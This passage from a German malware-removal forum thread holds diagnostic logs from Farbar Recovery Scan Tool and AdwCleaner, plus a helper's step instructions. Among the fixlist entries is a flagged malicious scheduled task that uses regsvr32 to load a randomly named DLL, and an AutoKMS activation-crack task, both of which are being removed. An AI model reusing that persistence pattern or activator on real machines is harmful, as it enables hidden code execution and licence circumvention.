2013-08-22 15:25 - 2017-05-22 18:30 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914389\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914405\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Wiederherstellungspunkte =========================
19-05-2017 15:50:08 Geplanter Prüfpunkt
21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (05/22/2017 06:29:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xedc
Startzeit der fehlerhaften Anwendung: 0x01d2d3188f15cdb1
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: b1ad504d-774d-47dc-8091-97f294125cee
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/22/2017 06:28:32 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/22/2017 06:26:47 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/22/2017 06:20:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x19e8
Startzeit der fehlerhaften Anwendung: 0x01d2d317569b506b
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 87de692b-dc4c-4e2d-8dc3-b2812352807f
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/22/2017 06:14:24 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/22/2017 05:52:25 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/22/2017 05:52:11 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/22/2017 05:49:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x2a84
Startzeit der fehlerhaften Anwendung: 0x01d2d3130a98ef70
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ae5b4a4d-a2c5-431d-ab57-77899d5ecaf4
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1ba0
Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.
Vorgang:
Generatordaten werden gesammelt
Kontext:
Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
Generatorname: System Writer
Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471}
Systemfehler:
=============
Error: (05/22/2017 06:29:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/22/2017 06:29:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/22/2017 06:29:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.
Error: (05/22/2017 06:29:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet:
Die Anforderung wird nicht unterstützt.
Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
CodeIntegrity:
===================================
Date: 2017-05-22 18:29:14.825
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-22 18:21:31.695
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-22 18:21:31.668
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-22 18:20:28.120
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-22 18:19:22.798
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-22 17:49:50.871
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-22 17:49:50.840
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 22:54:24.965
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 20:59:59.585
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 20:59:59.549
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5380.41 MB
Summe virtueller Speicher: 14271.12 MB
Verfügbarer virtueller Speicher: 11342.05 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:237.69 GB) (Free:148.33 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620.52 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================
|
|
22.05.2017, 20:31
| #14 |
| /// TB-Ausbilder | Trojaner, Adware oder sonstiges ? Servus, Schritt 1
Schritt 2
Schritt 2 Lade dir die passende Version von SystemLook vom folgenden Spiegel herunter und speichere das Tool auf dem Desktop: SystemLook (32 bit) | SystemLook (64 bit)
Schritt 3
Bitte poste mit deiner nächsten Antwort
|
|
23.05.2017, 17:34
| #15 |
| | Trojaner, Adware oder sonstiges ? Guten Abend, anbei die gewünschten Logs Code:
ATTFilter # AdwCleaner v6.046 - Bericht erstellt am 23/05/2017 um 18:18:23
# Aktualisiert am 24/04/2017 von Malwarebytes
# Datenbank : 2017-05-23.1 [Lokal]
# Betriebssystem : Windows 10 Pro (X64)
# Benutzername : Dino - ****
# Gestartet von : C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support
***** [ Dienste ] *****
***** [ Ordner ] *****
***** [ Dateien ] *****
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Verknüpfungen ] *****
***** [ Aufgabenplanung ] *****
***** [ Registrierungsdatenbank ] *****
***** [ Browser ] *****
*************************
:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Image File Execution Options" Schlüssel gelöscht
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Firewall Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht
!! Chrome Einstellungen nicht zurückgesetzt: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\Default
!! Chrome Einstellungen nicht zurückgesetzt: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [6849 Bytes] - [22/05/2017 18:19:38]
C:\AdwCleaner\AdwCleaner[C2].txt - [1640 Bytes] - [23/05/2017 18:13:04]
C:\AdwCleaner\AdwCleaner[C3].txt - [1420 Bytes] - [23/05/2017 18:18:23]
C:\AdwCleaner\AdwCleaner[S0].txt - [6473 Bytes] - [22/05/2017 18:18:35]
C:\AdwCleaner\AdwCleaner[S1].txt - [1479 Bytes] - [23/05/2017 18:12:22]
C:\AdwCleaner\AdwCleaner[S2].txt - [1624 Bytes] - [23/05/2017 18:16:09]
C:\AdwCleaner\AdwCleaner[S3].txt - [1697 Bytes] - [23/05/2017 18:18:04]
########## EOF - C:\AdwCleaner\AdwCleaner[C3].txt - [1785 Bytes] ##########
Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 22-05-2017
durchgeführt von Dino (23-05-2017 18:23:47) Run:1
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino (Verfügbare Profile: Dino)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
CloseProcesses:
C:\USERS\DINO\APPDATA\ROAMING\PROFILES
CMD: type "C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\profiles.ini"
Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
C:\Windows\AutoKMS
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
CMD: dir "%ProgramFiles%"
CMD: dir "%ProgramFiles(x86)%"
CMD: dir "%ProgramData%"
CMD: dir "%Appdata%"
CMD: dir "%LocalAppdata%"
CMD: dir "%CommonProgramFiles(x86)%"
CMD: dir "%CommonProgramW6432%"
CMD: dir "%UserProfile%"
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:
*****************
Prozesse erfolgreich geschlossen.
C:\USERS\DINO\APPDATA\ROAMING\PROFILES => erfolgreich verschoben
========= type "C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\profiles.ini" =========
[General]
StartWithLastProfile=1
[Profile0]
Name=default-1489247668614
IsRelative=1
Path=Profiles/rcgkbgt3.default-1489247668614
========= Ende von CMD: =========
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04670283-EDCA-415F-9886-04F65EE28E14} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04670283-EDCA-415F-9886-04F65EE28E14} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E847E30-5E1C-4E48-8586-201A11017D85} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E847E30-5E1C-4E48-8586-201A11017D85} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{57EE3E64-10C3-4731-B511-79FE0C97A37A} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{57EE3E64-10C3-4731-B511-79FE0C97A37A} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A839842C-D8D3-410F-A730-39BC24C4484E} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A839842C-D8D3-410F-A730-39BC24C4484E} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF7B870D-2508-4548-AF95-6776A6BBB9E1} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF7B870D-2508-4548-AF95-6776A6BBB9E1} => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{522333AA-23D9-85D6-489B-224F78B46908} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\AutoKMS => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => Schlüssel erfolgreich entfernt
C:\Windows\AutoKMS => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C571DD8E-3ED6-476A-BAAE-A345728189FD} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C571DD8E-3ED6-476A-BAAE-A345728189FD} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DE695851-C428-40A8-8661-95C82C81093C} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DE695851-C428-40A8-8661-95C82C81093C} => Schlüssel erfolgreich entfernt
